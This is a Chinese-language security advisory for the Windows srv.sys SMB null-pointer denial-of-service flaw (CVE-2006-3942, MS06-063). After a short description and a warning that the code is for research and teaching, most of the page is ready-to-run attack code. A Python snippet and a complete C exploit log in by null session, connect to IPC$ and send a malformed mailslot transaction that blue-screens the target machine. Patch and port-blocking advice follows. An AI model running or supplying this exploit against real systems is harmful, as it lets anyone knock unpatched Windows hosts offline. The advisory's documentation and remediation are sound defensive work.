Microsoft Windows SMB畸形管道请求处理远程拒绝服务漏洞(MS06-063)
发布日期:2006-07-28
更新日期:2006-10-11
受影响系统:
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows XP
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000 SP4
BUGTRAQ ID: 19215
CVE(CAN) ID: CVE-2006-3942
描述:
Microsoft Windows是微软发布的非常流行的操作系统。
Windows的Server驱动(srv.sys)在处理某些SMB数据时存在空指针引用错误,远程攻击者可能利用此漏洞导致Windows系统崩溃死机。
如果远程攻击者向有漏洞的系统发送包含未正确终止(缺少结束符)字符串的SMB_COM_TRANSACTION(0x25)消息,就可能触发该空指针引用,导致系统蓝屏死机。触发此漏洞不需要有效凭据:下面的测试代码以空会话(空用户名、空口令)登录并连接IPC$共享即可。目前已有公开的攻击代码。
<*来源:Tom Cross
David Means
Scott Warfield
Nsfocus安全小组 (security@nsfocus.com)
链接:http://secunia.com/advisories/21276/print/
http://xforce.iss.net/xforce/alerts/id/231
http://xforce.iss.net/xforce/xfdb/27999
http://blogs.technet.com/msrc/archive/2006/07/28/443837.aspx
http://marc.theaimsgroup.com/?l=bugtraq&m=115568162330128&w=2
http://www.microsoft.com/technet/security/Bulletin/MS06-063.mspx
http://www.us-cert.gov/cas/techalerts/TA06-283A.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Minimal reproduction: anonymous (null-session) login, tree connect to IPC$,
# then a single SMB_COM_TRANSACTION carrying an arbitrary transaction name.
# `smb` is an impacket-style SMB client module (not imported here, not stdlib).
s = smb.SMB('*SMBSERVER', '10.0.1.44')
s.login('', '')                                    # empty user and password: null session
share = r'\\*SMBSERVER\IPC$'
tid = s.tree_connect_andx(share)
setup = '\x01\x00\x00\x00\x00\x00'                 # raw setup words, unchanged from the original
s.send_trans(tid, setup, 'cuchicuchi', '', '')     # empty parameter and data blocks
/*******************************************************************
Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035)
Linux based Exploit
CVE ID: CVE-2006-3942
Securityfocus BID: 19215 (http://www.securityfocus.com/bid/19215/discuss)
Microsoft: MS06-035 (see also MS06-063, which addresses CVE-2006-3942)
Author: K.K.Senthil Velan
Email: senthilvelan@gmail.com
Description: This code was modified in order to exploit the MS06_035 vulnerability from a Linux
machine.
The entire C code and shellcode were written by cocoruder (frankruder_at_hotmail.com); I have
ported this code to Linux-based C.
Full credit goes to cocoruder(frankruder_at_hotmail.com) and milw0rm.com
page:http://ruder.cdut.net
*******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
/* SMB_COM_NEGOTIATE (0x72) request, NetBIOS-framed, offering the single
 * dialect "NT LM 0.12". The 3-byte big-endian NetBIOS length (0x2f = 47)
 * counts everything after the 4-byte session header. main() sends
 * sizeof(...) - 1 bytes so the string literal's trailing NUL is not sent.
 * Field names below follow the SMB1 header layout. */
unsigned char SmbNegotiate[] =
    "\x00\x00\x00\x2f"                          /* NetBIOS: 47 bytes follow        */
    "\xff\x53\x4d\x42\x72"                      /* "\xffSMB", command 0x72         */
    "\x00\x00\x00\x00"                          /* status                          */
    "\x00"                                      /* flags                           */
    "\x00\x00\x00\x00"                          /* flags2, PID high                */
    "\x00\x00\x00\x00\x00\x00\x00\x00"          /* signature                       */
    "\x00\x00"                                  /* reserved                        */
    "\x00\x00\x88\x05\x00\x00\x00\x00"          /* TID 0, PID 0x0588, UID 0, MID 0 */
    "\x00\x0c\x00"                              /* WordCount 0, ByteCount 12       */
    "\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"; /* "\x02NT LM 0.12\0"      */
/* SMB_COM_SESSION_SETUP_ANDX (0x73) request for a null session: both
 * password lengths are 0 and the account and domain strings are empty, so
 * no credentials are needed to reach the later requests. The NetBIOS length
 * 0x48 = 72 covers everything after the 4-byte session header. The server's
 * reply carries the assigned UID at offset 0x20, which main() copies into
 * the following requests. Field names follow the SMB1 layout. */
unsigned char Session_Setup_AndX_Request[] =
    "\x00\x00\x00\x48"                          /* NetBIOS: 72 bytes follow             */
    "\xff\x53\x4d\x42\x73"                      /* "\xffSMB", command 0x73              */
    "\x00\x00\x00\x00"                          /* status                               */
    "\x08"                                      /* flags                                */
    "\x00\x00\x00\x00"                          /* flags2, PID high                     */
    "\x00\x00\x00\x00\x00\x00\x00\x00"          /* signature                            */
    "\x00\x00"                                  /* reserved                             */
    "\xff\xff\x88\x05\x00\x00\x00\x00"          /* TID 0xffff, PID 0x0588, UID 0, MID 0 */
    "\x0d"                                      /* WordCount 13                         */
    "\xff\x00\x00\x00"                          /* AndXCommand none, reserved, AndXOffset */
    "\xff\xff\x02\x00\x88\x05"                  /* MaxBuffer, MaxMpx, VcNumber          */
    "\x00\x00\x00\x00"                          /* SessionKey                           */
    "\x00\x00\x00\x00"                          /* ANSI / Unicode password length: 0, 0 */
    "\x00\x00\x00\x00"                          /* reserved                             */
    "\x01\x00\x00\x00"                          /* Capabilities                         */
    "\x0b\x00"                                  /* ByteCount 11                         */
    "\x00\x00\x6e\x74\x00\x70\x79\x73\x6d\x62\x00"; /* "" account, "" domain, "nt", "pysmb" */
/* SMB_COM_TREE_CONNECT_ANDX (0x75) request for the IPC$ share. The share
 * path is UTF-16LE (flags2 has the Unicode bit set) and is HARD-CODED to
 * \\172.22.5.46\IPC$: main() never rewrites it from argv[1], only the UID at
 * offset 0x20. Whether the server compares the host part against its own
 * name is not established by this listing. The reply's TID at offset 0x1c
 * is copied into Trans_Request. NetBIOS length 0x58 = 88. */
unsigned char TreeConnect_AndX_Request[] =
    "\x00\x00\x00\x58"                          /* NetBIOS: 88 bytes follow                 */
    "\xff\x53\x4d\x42\x75"                      /* "\xffSMB", command 0x75                  */
    "\x00\x00\x00\x00"                          /* status                                   */
    "\x18"                                      /* flags                                    */
    "\x07\xc8"                                  /* flags2 0xc807 (Unicode bit set)          */
    "\x00\x00"                                  /* PID high                                 */
    "\x00\x00\x00\x00\x00\x00\x00\x00"          /* signature                                */
    "\x00\x00"                                  /* reserved                                 */
    "\x00\x00\xff\xfe\x00\x08\x00\x03"          /* TID 0, PID 0xfeff, UID 0x0800 (patched by main), MID 0x0300 */
    "\x04"                                      /* WordCount 4                              */
    "\xff\x00\x58\x00"                          /* AndXCommand none, reserved, AndXOffset 0x58 */
    "\x08\x00"                                  /* Flags                                    */
    "\x01\x00"                                  /* PasswordLength 1                         */
    "\x2d\x00"                                  /* ByteCount 45                             */
    "\x00"                                      /* Password: a single NUL                   */
    "\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00\x2e\x00\x32\x00"
    "\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"  /* L"\\172.22.5.46" (hard-coded)  */
    "\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"  /* L"\IPC$" + NUL                 */
    "\x3f\x3f\x3f\x3f\x3f\x00";                         /* Service "?????"                */
/* The crafted SMB_COM_TRANSACTION (0x25): a mailslot write whose
 * transaction name "\MAILSLOT\LANMANA" is exactly 17 bytes with NO
 * terminating NUL (ByteCount 17 ends the packet on the final 'A'). That
 * unterminated string is the malformed element the advisory describes.
 * DataOffset 0x55 = 85, measured from the SMB header, lands on the very last
 * byte of this buffer (index 89 of 90), so the declared 1-byte data block
 * overlaps the name. main() patches the TID at 0x1c and the UID at 0x20.
 * NetBIOS length 0x56 = 86. Field names follow the SMB1 layout. */
unsigned char Trans_Request[] =
    "\x00\x00\x00\x56"                          /* NetBIOS: 86 bytes follow                 */
    "\xff\x53\x4d\x42\x25"                      /* "\xffSMB", command 0x25                  */
    "\x00\x00\x00\x00"                          /* status                                   */
    "\x00"                                      /* flags                                    */
    "\x01\x00"                                  /* flags2                                   */
    "\x00\x00"                                  /* PID high                                 */
    "\x00\x00\x00\x00\x00\x00\x00\x00"          /* signature                                */
    "\x00\x00"                                  /* reserved                                 */
    "\x00\x08\x88\x05\x00\x08\x00\x00"          /* TID (patched), PID 0x0588, UID (patched), MID 0 */
    "\x11"                                      /* WordCount 17 = 14 + 3 setup words        */
    "\x00\x00"                                  /* TotalParameterCount 0                    */
    "\x01\x00"                                  /* TotalDataCount 1                         */
    "\x00\x04"                                  /* MaxParameterCount 0x400                  */
    "\xe0\xff"                                  /* MaxDataCount 0xffe0                      */
    "\x00"                                      /* MaxSetupCount                            */
    "\x00"                                      /* reserved                                 */
    "\x00\x00"                                  /* Flags                                    */
    "\x00\x00\x00\x00"                          /* Timeout                                  */
    "\x00\x00"                                  /* reserved                                 */
    "\x00\x00"                                  /* ParameterCount 0                         */
    "\x55\x00"                                  /* ParameterOffset 85                       */
    "\x01\x00"                                  /* DataCount 1                              */
    "\x55\x00"                                  /* DataOffset 85 = last byte of the buffer  */
    "\x03"                                      /* SetupCount 3                             */
    "\x00"                                      /* reserved                                 */
    "\x01\x00\x00\x00\x00\x00"                  /* Setup[0..2]                              */
    "\x11\x00"                                  /* ByteCount 17                             */
    "\x5c\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41"; /* "\MAILSLOT\LANMANA", no NUL */
/* Scratch buffer for every reply; main() reads the 2-byte UID (0x20) and
 * TID (0x1c) fields back out of it after each exchange. */
unsigned char recvbuff[2048];
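/*
 * Send the raw SMB_COM_NEGOTIATE template on an already-connected socket.
 *
 * s: connected TCP socket to the target's SMB port.
 *
 * Not called by main() in this listing (main inlines the same send); kept
 * as part of the listing's interface. The original version declared an
 * unused 1 KiB local buffer and ignored the send() result; both are fixed.
 * Nothing is read back here — the caller is expected to recv() the reply.
 */
void neg(int s)
{
    /* sizeof - 1 drops the string literal's terminating NUL; the NetBIOS
     * length prefix inside the template already describes the payload. */
    size_t len = sizeof(SmbNegotiate) - 1;
    ssize_t sent = send(s, SmbNegotiate, len, 0);
    if (sent < 0 || (size_t)sent != len) {
        perror("send SmbNegotiate");
    }
}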
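/* SMB header field offsets, measured from the start of the NetBIOS-framed
 * packet (4-byte length prefix + 32-byte SMB header). The reply fields at
 * these offsets are copied verbatim into the next request, so a reply must
 * be at least SMB_MIN_REPLY bytes long before they are read. */
enum {
    SMB_TID_OFFSET    = 0x1c, /* 2-byte tree id                                */
    SMB_UID_OFFSET    = 0x20, /* 2-byte user id                                */
    SMB_MIN_REPLY     = 36,   /* NetBIOS header + SMB header                   */
    REPLY_TIMEOUT_SEC = 10    /* bound on recv(); the target may stop answering */
};

/*
 * Send one raw request template and read the reply into recvbuff.
 *
 * sock: connected TCP socket.
 * req/len: request bytes (len already excludes the literal's trailing NUL).
 * what: template name used in diagnostics.
 *
 * Returns the reply length (>= SMB_MIN_REPLY) or -1 after printing why.
 * The original code ignored short sends, recv() failures and short replies
 * and then read UID/TID fields out of whatever recvbuff happened to hold.
 */
static ssize_t smb_exchange(int sock, const unsigned char *req, size_t len,
                            const char *what)
{
    ssize_t n = send(sock, req, len, 0);
    if (n < 0 || (size_t)n != len) {
        printf("send %s error!\n", what);
        return -1;
    }
    n = recv(sock, recvbuff, sizeof(recvbuff), 0);
    if (n < 0) {
        printf("recv after %s failed\n", what);
        perror("recv");
        return -1;
    }
    if (n < SMB_MIN_REPLY) {
        printf("reply to %s too short (%zd bytes)\n", what, n);
        return -1;
    }
    return n;
}

/*
 * Entry point: MS06_035 <target-ip> <port>.
 *
 * Walks the SMB1 handshake with the hard-coded templates above — negotiate,
 * null-session setup (empty account and password), tree connect to IPC$ —
 * copying the UID and TID the server assigns into the later requests, then
 * sends the crafted SMB_COM_TRANSACTION and reports whatever comes back
 * within REPLY_TIMEOUT_SEC. Only the two bytes at each offset are copied,
 * which removes the original's unaligned/aliasing reads through an
 * unsigned int *. Returns EXIT_SUCCESS once the final request was sent,
 * EXIT_FAILURE on any argument, socket or exchange error. (The original
 * declared main as void, kept send()/connect() results in an unsigned int
 * so -1 was never detected, accepted fd 0 as a failure, never validated
 * the address or port, and exited 0 even on usage errors.)
 */
int main(int argc, char **argv)
{
    printf("Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) \n");
    printf("Linux based Exploit \n\n");
    printf("Author: K.K.Senthil Velan \n");
    printf("Email: senthilvelan@gmail.com \n");
    printf("Full credit goes to cocoruder(frankruder_at_hotmail.com) and milw0rm.com \n");
    printf("page:http://ruder.cdut.net \n\n");

    if (argc < 3) {
        printf("Insufficient arguments: \n");
        printf("Syntax: MS06_035 < Target > < Port > \n");
        return EXIT_FAILURE;
    }

    struct sockaddr_in server = { .sin_family = AF_INET };
    if (inet_pton(AF_INET, argv[1], &server.sin_addr) != 1) {
        printf("invalid target address: %s\n", argv[1]);
        return EXIT_FAILURE;
    }
    char *end = NULL;
    long port = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || port < 1 || port > 65535) {
        printf("invalid port: %s\n", argv[2]);
        return EXIT_FAILURE;
    }
    server.sin_port = htons((unsigned short)port);

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) { /* 0 is a valid descriptor; only a negative result is an error */
        perror("socket");
        return EXIT_FAILURE;
    }
    /* Bound every recv(): a target that crashes or stops replying would
     * otherwise leave the final read blocked forever. */
    struct timeval tv = { .tv_sec = REPLY_TIMEOUT_SEC, .tv_usec = 0 };
    if (setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv) < 0) {
        perror("setsockopt(SO_RCVTIMEO)"); /* non-fatal: recv() will simply block */
    }
    if (connect(sock, (struct sockaddr *)&server, sizeof server) < 0) {
        printf("connect error!\n");
        close(sock);
        return EXIT_FAILURE;
    }

    int rc = EXIT_FAILURE;
    unsigned char uid[2];
    unsigned char tid[2];
    size_t len;
    ssize_t n;

    if (smb_exchange(sock, SmbNegotiate, sizeof(SmbNegotiate) - 1,
                     "SmbNegotiate") < 0) {
        goto out;
    }
    if (smb_exchange(sock, Session_Setup_AndX_Request,
                     sizeof(Session_Setup_AndX_Request) - 1,
                     "Session_Setup_AndX_Request") < 0) {
        goto out;
    }
    /* UID the server assigned to the null session; needed by every later request. */
    memcpy(uid, recvbuff + SMB_UID_OFFSET, sizeof uid);

    memcpy(TreeConnect_AndX_Request + SMB_UID_OFFSET, uid, sizeof uid);
    if (smb_exchange(sock, TreeConnect_AndX_Request,
                     sizeof(TreeConnect_AndX_Request) - 1,
                     "TreeConnect_AndX_Request") < 0) {
        goto out;
    }
    /* TID for the IPC$ connection (the share path itself is hard-coded in the template). */
    memcpy(tid, recvbuff + SMB_TID_OFFSET, sizeof tid);

    memcpy(Trans_Request + SMB_UID_OFFSET, uid, sizeof uid);
    memcpy(Trans_Request + SMB_TID_OFFSET, tid, sizeof tid);

    /* The final request is sent without the helper: a well-formed reply is
     * not required and the target may not answer at all, so the outcome of
     * the bounded recv() is only reported, never treated as an error. */
    len = sizeof(Trans_Request) - 1;
    n = send(sock, Trans_Request, len, 0);
    if (n < 0 || (size_t)n != len) {
        printf("send Trans_Request error!\n");
        goto out;
    }
    n = recv(sock, recvbuff, sizeof(recvbuff), 0);
    if (n > 0) {
        printf("target answered with %zd bytes\n", n);
    } else if (n == 0) {
        printf("target closed the connection\n");
    } else {
        printf("no reply within %d s\n", REPLY_TIMEOUT_SEC);
    }
    printf("Exploit Completed !!! \n");
    rc = EXIT_SUCCESS;

out:
    close(sock);
    return rc;
}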
建议:
临时解决方法:
* 在边界防火墙上阻断TCP端口139和445上的入站和出站通讯。
注意:本页的测试代码以空会话(空用户名和空口令)登录并连接IPC$共享即可触发该漏洞,因此帐户口令并不能缓解此问题;在打补丁之前应确保139/445端口不暴露给不可信网络。
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS06-063)以及相应补丁:
MS06-063:Vulnerability in Server Service Could Allow Denial of Service and Remote Code Execution (923414)
链接:http://www.microsoft.com/technet/security/Bulletin/MS06-063.mspx
